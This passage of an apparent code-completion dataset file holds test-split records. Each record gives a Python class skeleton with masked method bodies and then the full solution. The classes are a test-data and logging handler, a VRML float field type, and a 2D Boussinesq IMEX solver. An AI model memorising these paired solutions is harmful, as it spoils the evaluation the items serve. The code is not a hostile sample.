self.params.x_bounds, self.params.z_bounds, self.bc_hor[0], self.bc_ver[0])\n self.Id, self.M = getBoussinesq2DMatrix(self.N, self.h, self.bc_hor, self.bc_ver, self.params.c_s, self.params.Nfreq, self.params.order)\n self.D_upwind = getBoussinesq2DUpwindMatrix(self.N, self.h[0], self.params.u_adv, self.params.order_upw)\n self.gmres_logger = logging()\n\n def solve_system(self, rhs, factor, u0, t):\n \"\"\"Simple linear solver for (I-dtA)u = rhs using GMRES Args: rhs (dtype_f): right-hand side for the nonlinear system factor (float): abbrev. 
for the node-to-node stepsize (or any other factor required) u0 (dtype_u): initial guess for the iterative solver (not used here so far) t (float): current time (e.g. for time-dependent BCs) Returns: dtype_u: solution as mesh\"\"\"\n b = rhs.flatten()\n cb = Callback()\n sol, info = gmres(self.Id - factor * self.M, b, x0=u0.flatten(), tol=self.params.gmres_tol_limit, restart=self.params.gmres_restart, maxiter=self.params.gmres_maxiter, callback=cb)\n if factor != 0.0:\n self.gmres_logger.add(cb.getcounter())\n me = self.dtype_u(self.init)\n me[:] = unflatten(sol, 4, self.N[0], self.N[1])\n return me\n\n def __eval_fexpl(self, u, t):\n \"\"\"Helper routine to evaluate the explicit part of the RHS Args: u (dtype_u): current values (not used here) t (float): current time Returns: explicit part of RHS\"\"\"\n fexpl = self.dtype_u(self.init)\n temp = u.flatten()\n temp = self.D_upwind.dot(temp)\n fexpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fexpl\n\n def __eval_fimpl(self, u, t):\n \"\"\"Helper routine to evaluate the implicit part of the RHS Args: u (dtype_u): current values t (float): current time (not used here) Returns: implicit part of RHS\"\"\"\n temp = u.flatten()\n temp = self.M.dot(temp)\n fimpl = self.dtype_u(self.init)\n fimpl[:] = unflatten(temp, 4, self.N[0], self.N[1])\n return fimpl\n\n def eval_f(self, u, t):\n \"\"\"Routine to evaluate both parts of the RHS Args: u (dtype_u): current values t (float): current time Returns: dtype_f: the RHS divided into two parts\"\"\"\n f = self.dtype_f(self.init)\n f.impl = self.__eval_fimpl(u, t)\n f.expl = self.__eval_fexpl(u, t)\n return f\n\n def u_exact(self, t):\n \"\"\"Routine to compute the exact solution at time t Args: t (float): current time Returns: dtype_u: exact solution\"\"\"\n dtheta = 0.01\n H = 10.0\n a = 5.0\n x_c = -50.0\n me = self.dtype_u(self.init)\n me[0, :, :] = 0.0 * self.xx\n me[1, :, :] = 0.0 * self.xx\n me[2, :, :] = dtheta * np.sin(np.pi * self.zz / H) / (1.0 + np.square(self.xx - x_c) / (a * a))\n me[3, :, :] = 0.0 * self.xx\n return me\n", "source": "the_stack_v2_python_sparse", "source_path": "pySDC/implementations/problem_classes/Boussinesq_2D_FD_imex.py", "source_repo": "ruthschoebel/pySDC", "split": "test", "star_events_count": 0} {"blob_id": "90bd4ac55df9cf4bc987abf706d68d2ce7c99b2e", "bodies": ["if not email:\n raise ValueError('Users must have an email address')\nuser = self.model(email=self.normalize_email(email), name=name)\nuser.set_password(password)\nuser.save(using=self._db)\nreturn user", "user = self.create_user(email, password=password, name=name)\nuser.is_admin = True\nuser.is_staff = True\nuser.save(using=self._db)\nreturn user"], "bodies_text": "<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "class_docstring": "", "class_name": "UserProfileManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserProfileManager:\n\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, email, name, password):\n 
\"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000410", "length_bytes": 5621, "license_type": "no_license", "methods": [{"docstring": "创建普通用户 Creates and saves a User with the given email, date of birth and password.", "name": "create_user", "signature": "def create_user(self, email, name, password=None)"}, {"docstring": "创建超级用户 Creates and saves a superuser with the given email, date of birth and password.", "name": "create_superuser", "signature": "def create_superuser(self, email, name, password)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005962", "prompt": "Implement the Python class `UserProfileManager` described below.\n\nClass description:\nImplement the UserProfileManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, email, name, password=None): 创建普通用户 Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, email, name, password): 创建超级用户 Creates and saves a superuser with the given email, date of birth and password.", "prompted_full_text": "Implement the Python class `UserProfileManager` described below.\n\nClass description:\nImplement the UserProfileManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, email, name, password=None): 创建普通用户 Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, email, name, password): 创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\n\n<|skeleton|>\nclass UserProfileManager:\n\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "revision_id": "cc475863b0f6f574de79fc8d1fa91b9d0d5449d8", "skeleton": "<|skeleton|>\nclass UserProfileManager:\n\n def create_user(self, email, name, password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserProfileManager:\n def create_user(self, email, name, 
password=None):\n \"\"\"创建普通用户 Creates and saves a User with the given email, date of birth and password.\"\"\"\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(email=self.normalize_email(email), name=name)\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, email, name, password):\n \"\"\"创建超级用户 Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n user = self.create_user(email, password=password, name=name)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n", "source": "the_stack_v2_python_sparse", "source_path": "mgmt/models.py", "source_repo": "starjoe/PWM", "split": "test", "star_events_count": 0} {"blob_id": "a6db8d95776f07f9fa129ab238739577057429a4", "bodies": ["self.assertEqual(super_algos.find_min(''), -1)\nself.assertEqual(super_algos.sum_all([]), -1)\nself.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\nself.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\nself.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))", "self.assertEqual(super_algos.sum_all(''), -1)\nself.assertEqual(super_algos.sum_all([]), -1)\nself.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\nself.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\nself.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))", "self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\nself.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\nself.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\nself.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\nself.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\nself.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))"], "bodies_text": "<|body_start_0|>\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n<|end_body_2|>\n", "class_docstring": "", "class_name": "MyTestCases", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyTestCases:\n\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n <|body_0|>\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n <|body_1|>\n\n def test_possible_string(self):\n 
\"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000411", "length_bytes": 1720, "license_type": "no_license", "methods": [{"docstring": "Test Function: * Tests if all instructions are followed for find_min(list)", "name": "test_find_min", "signature": "def test_find_min(self)"}, {"docstring": "Test Function: * Tests if all instructions are followed for sum_all(list)", "name": "test_sum_all", "signature": "def test_sum_all(self)"}, {"docstring": "Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)", "name": "test_possible_string", "signature": "def test_possible_string(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002600", "prompt": "Implement the Python class `MyTestCases` described below.\n\nClass description:\nImplement the MyTestCases class.\n\nMethod signatures and docstrings:\n- def test_find_min(self): Test Function: * Tests if all instructions are followed for find_min(list)\n- def test_sum_all(self): Test Function: * Tests if all instructions are followed for sum_all(list)\n- def test_possible_string(self): Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)", "prompted_full_text": "Implement the Python class `MyTestCases` described below.\n\nClass description:\nImplement the MyTestCases class.\n\nMethod signatures and docstrings:\n- def test_find_min(self): Test Function: * Tests if all instructions are followed for find_min(list)\n- def test_sum_all(self): Test Function: * Tests if all instructions are followed for sum_all(list)\n- def test_possible_string(self): Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\n\n<|skeleton|>\nclass MyTestCases:\n\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n <|body_0|>\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n <|body_1|>\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.assertEqual(super_algos.find_min(''), -1)\n 
self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n<|end_body_1|>\n\n<|body_start_2|>\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n<|end_body_2|>\n", "revision_id": "c27509693894b54c077bc40a4d4dfbfa311e029b", "skeleton": "<|skeleton|>\nclass MyTestCases:\n\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n <|body_0|>\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n <|body_1|>\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyTestCases:\n def test_find_min(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_min(list)\"\"\"\n self.assertEqual(super_algos.find_min(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.find_min([1, 'a', 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.find_min([1, 2, 3, 4]), min([1, 2, 3, 4]))\n\n def test_sum_all(self):\n \"\"\"Test Function: * Tests if all instructions are followed for sum_all(list)\"\"\"\n self.assertEqual(super_algos.sum_all(''), -1)\n self.assertEqual(super_algos.sum_all([]), -1)\n self.assertEqual(super_algos.sum_all([1, 'a', 3, 4]), -1)\n self.assertEqual(super_algos.find_min([1, 1.3, 5, 6]), -1)\n self.assertEqual(super_algos.sum_all([1, 2, 3, 4]), sum([1, 2, 3, 4]))\n\n def test_possible_string(self):\n \"\"\"Test Function: * Tests if all instructions are followed for find_possible_srings(list, int)\"\"\"\n self.assertIsInstance(super_algos.find_possible_strings(['a', 'b'], 2), list)\n self.assertEqual([], super_algos.find_possible_strings(['1', 'a'], 1))\n self.assertEqual([], super_algos.find_possible_strings([1, 2, 3, 4], 2))\n self.assertEqual([], super_algos.find_possible_strings(['', 'a'], 2))\n self.assertEqual(['a', 'a', 'a'], super_algos.find_possible_strings(['a'], 3))\n self.assertEqual(['aa', 'ab', 'ba', 'bb'], super_algos.find_possible_strings(['a', 'b'], 2))\n", "source": "the_stack_v2_python_sparse", "source_path": "python_projects/Recurrsion/submission_004-problem/test_algos.py", "source_repo": "Mbuso21/WeThinkCode-Projects", "split": "test", "star_events_count": 0} {"blob_id": "a0fbfd71c4c5e2facae06d5f226181f92e29c5dd", "bodies": ["output = []\naccounts = []\nfor x in ids:\n if x not in 
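The core of the `boussinesq_2d_imex` record above is `solve_system`, which solves the implicit system (I - dt*M) u = rhs with restarted GMRES and tracks iteration counts through a callback. Below is a self-contained sketch of that pattern, with a 1-D Laplacian standing in for the Boussinesq matrix M and a plain counter standing in for the record's `Callback`/`logging` helpers (neither of which is shown in the dump), so treat the operator and tolerances as illustrative assumptions.

import numpy as np
import scipy.sparse as sp
from scipy.sparse.linalg import gmres

class IterCounter:
    """Counts GMRES iterations, like the Callback object in the record."""
    def __init__(self):
        self.niter = 0
    def __call__(self, residual_norm):  # legacy callback: one call per iteration
        self.niter += 1

n, dt = 100, 0.1
# Stand-in sparse operator M (1-D Laplacian stencil); shape must be given
# because scalar diagonals are broadcast.
M = sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], shape=(n, n), format='csr')
I = sp.identity(n, format='csr')
rhs = np.ones(n)

cb = IterCounter()
sol, info = gmres(I - dt * M, rhs, x0=np.zeros(n),
                  rtol=1e-10,   # named tol on SciPy < 1.12, as in the record
                  restart=20, maxiter=100, callback=cb)
print(info, cb.niter)           # info == 0 means GMRES converged

As in the record, the solution vector would then be reshaped back onto the (4, Nx, Nz) mesh (the `unflatten` helper), and the iteration count logged only for genuinely implicit solves (factor != 0).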
accounts:\n accounts.append(x)\n else:\n output.append(x)\nreturn output", "if context is None:\n context = {}\ndata = self.read(cr, uid, ids, context=context)[0]\nobj_account = self.pool.get('account.account')\nchild_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\nconsild = []\nfor acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\nall_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\nif data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\nelse:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\nreturn {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}", "if context is None:\n context = {}\ndata = self.read(cr, uid, ids, context=context)[0]\nobj_account = self.pool.get('account.account')\nchart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\nconsoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\nfor acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\nreturn {}"], "bodies_text": "<|body_start_0|>\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n<|end_body_0|>\n\n<|body_start_1|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 
'ir.actions.act_window'}\n<|end_body_1|>\n\n<|body_start_2|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n<|end_body_2|>\n", "class_docstring": "This model to update consolidation chart of account and validate the account not belong in consolidate accounts", "class_name": "account_tree", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n <|body_0|>\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n <|body_1|>\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n<|end_body_0|>\n\n<|body_start_1|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n<|end_body_1|>\n\n<|body_start_2|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), 
('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000412", "length_bytes": 4112, "license_type": "no_license", "methods": [{"docstring": "Get account id from all charts of account @return: List of account ids", "name": "uniq", "signature": "def uniq(self, cr, uid, ids)"}, {"docstring": "Validate all accounts belong in consolidation account or not @return: dictionary of values", "name": "validate_move", "signature": "def validate_move(self, cr, uid, ids, context=None)"}, {"docstring": "Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values", "name": "update_consil", "signature": "def update_consil(self, cr, uid, ids, context=None)"}], "n_methods": 3, "prompt": "Implement the Python class `account_tree` described below.\n\nClass description:\nThis model to update consolidation chart of account and validate the account not belong in consolidate accounts\n\nMethod signatures and docstrings:\n- def uniq(self, cr, uid, ids): Get account id from all charts of account @return: List of account ids\n- def validate_move(self, cr, uid, ids, context=None): Validate all accounts belong in consolidation account or not @return: dictionary of values\n- def update_consil(self, cr, uid, ids, context=None): Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values", "prompted_full_text": "Implement the Python class `account_tree` described below.\n\nClass description:\nThis model to update consolidation chart of account and validate the account not belong in consolidate accounts\n\nMethod signatures and docstrings:\n- def uniq(self, cr, uid, ids): Get account id from all charts of account @return: List of account ids\n- def validate_move(self, cr, uid, ids, context=None): Validate all accounts belong in consolidation account or not @return: dictionary of values\n- def update_consil(self, cr, uid, ids, context=None): Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\n\n<|skeleton|>\nclass account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n <|body_0|>\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n <|body_1|>\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n<|end_body_0|>\n\n<|body_start_1|>\n if context is None:\n context = {}\n data = 
self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n<|end_body_1|>\n\n<|body_start_2|>\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n<|end_body_2|>\n", "revision_id": "0b997095c260d58b026440967fea3a202bef7efb", "skeleton": "<|skeleton|>\nclass account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n <|body_0|>\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n <|body_1|>\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": 